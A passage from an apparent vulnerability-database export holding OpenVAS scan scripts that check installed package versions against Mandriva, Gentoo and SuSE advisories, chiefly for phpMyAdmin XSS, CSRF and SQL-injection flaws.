See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63257\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\", \"CVE-2008-5622\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:32", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.", "modified": "2017-07-07T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:63450", "href": "http://plugins.openvas.org/nasl.php?oid=63450", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026_1.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026-1 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nUpdate:\n\nThe previous update packages wasn't signed, this time they are.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026-1\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.\";\n\n \n\nif(description)\n{\n script_id(63450);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 19:11:09 +0100 (Mon, 02 Mar 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:43", "bulletinFamily": "scanner", "cvelist": 
["CVE-2007-5977", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-32.", "modified": "2017-07-07T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:63616", "href": "http://plugins.openvas.org/nasl.php?oid=63616", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of\nwhich may allow for remote code execution.\";\ntag_solution = \"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.11.9.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-32\nhttp://bugs.gentoo.org/show_bug.cgi?id=237781\nhttp://bugs.gentoo.org/show_bug.cgi?id=244914\nhttp://bugs.gentoo.org/show_bug.cgi?id=246831\nhttp://bugs.gentoo.org/show_bug.cgi?id=250752\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-32.\";\n\n \n \n\nif(description)\n{\n script_id(63616);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2008-4096\", \"CVE-2008-4775\", \"CVE-2007-5977\", \"CVE-2006-6942\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 2.11.9.4\"), vulnerable: make_list(\"lt 2.11.9.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5977", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-32.", "modified": "2018-04-06T00:00:00", "published": "2009-03-20T00:00:00", "id": "OPENVAS:136141256231063616", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063616", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of\nwhich may allow for remote code execution.\";\ntag_solution = \"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.11.9.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-32\nhttp://bugs.gentoo.org/show_bug.cgi?id=237781\nhttp://bugs.gentoo.org/show_bug.cgi?id=244914\nhttp://bugs.gentoo.org/show_bug.cgi?id=246831\nhttp://bugs.gentoo.org/show_bug.cgi?id=250752\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-32.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63616\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-20 00:52:38 +0100 (Fri, 20 Mar 2009)\");\n script_cve_id(\"CVE-2008-4096\", \"CVE-2008-4775\", \"CVE-2007-5977\", \"CVE-2006-6942\", \"CVE-2008-5621\");\n 
script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-32 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 2.11.9.4\"), vulnerable: make_list(\"lt 2.11.9.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0125", "CVE-2008-2383", "CVE-2008-3197", "CVE-2008-5902", "CVE-2008-1924", "CVE-2009-0034", "CVE-2009-0135", "CVE-2008-5907", "CVE-2008-5432", "CVE-2008-2960", "CVE-2008-5824", "CVE-2008-4326", "CVE-2009-0136", "CVE-2008-5904", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-5903", "CVE-2008-4309", "CVE-2009-0126", "CVE-2008-4096", "CVE-2008-5081", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. 
Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "modified": "2017-07-11T00:00:00", "published": "2009-02-02T00:00:00", "id": "OPENVAS:63304", "href": "http://plugins.openvas.org/nasl.php?oid=63304", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:003", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_003.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:003\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. 
Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_id(63304);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-02 23:28:24 +0100 (Mon, 02 Feb 2009)\");\n script_cve_id(\"CVE-2008-3197\", \"CVE-2008-5081\", \"CVE-2008-5432\", \"CVE-2008-1149\", \"CVE-2008-5824\", \"CVE-2008-5903\", \"CVE-2008-5902\", \"CVE-2008-5907\", \"CVE-2008-5904\", \"CVE-2008-1567\", \"CVE-2009-0125\", \"CVE-2009-0126\", \"CVE-2008-4326\", \"CVE-2008-4309\", \"CVE-2008-2960\", \"CVE-2008-5621\", \"CVE-2008-2383\", \"CVE-2008-1924\", \"CVE-2009-0034\", \"CVE-2009-0136\", \"CVE-2008-4096\", \"CVE-2009-0135\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:003\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi\", rpm:\"at-spi~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-devel\", rpm:\"at-spi-devel~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-doc\", rpm:\"at-spi-doc~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-lang\", rpm:\"at-spi-lang~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"autofs\", rpm:\"autofs~5.0.3~82.28.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager\", rpm:\"backup-manager~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager-lang\", rpm:\"backup-manager-lang~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero\", rpm:\"brasero~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += 
res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-doc\", rpm:\"brasero-doc~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-lang\", rpm:\"brasero-lang~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~145.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash\", rpm:\"crash~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-sial\", rpm:\"crash-sial~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-main-menu\", rpm:\"gnome-main-menu~0.9.11~22.9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2\", rpm:\"gtk2~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-branding-upstream\", rpm:\"gtk2-branding-upstream~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-devel\", rpm:\"gtk2-devel~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-doc\", rpm:\"gtk2-doc~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-lang\", rpm:\"gtk2-lang~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal\", rpm:\"hal~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal-devel\", rpm:\"hal-devel~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != 
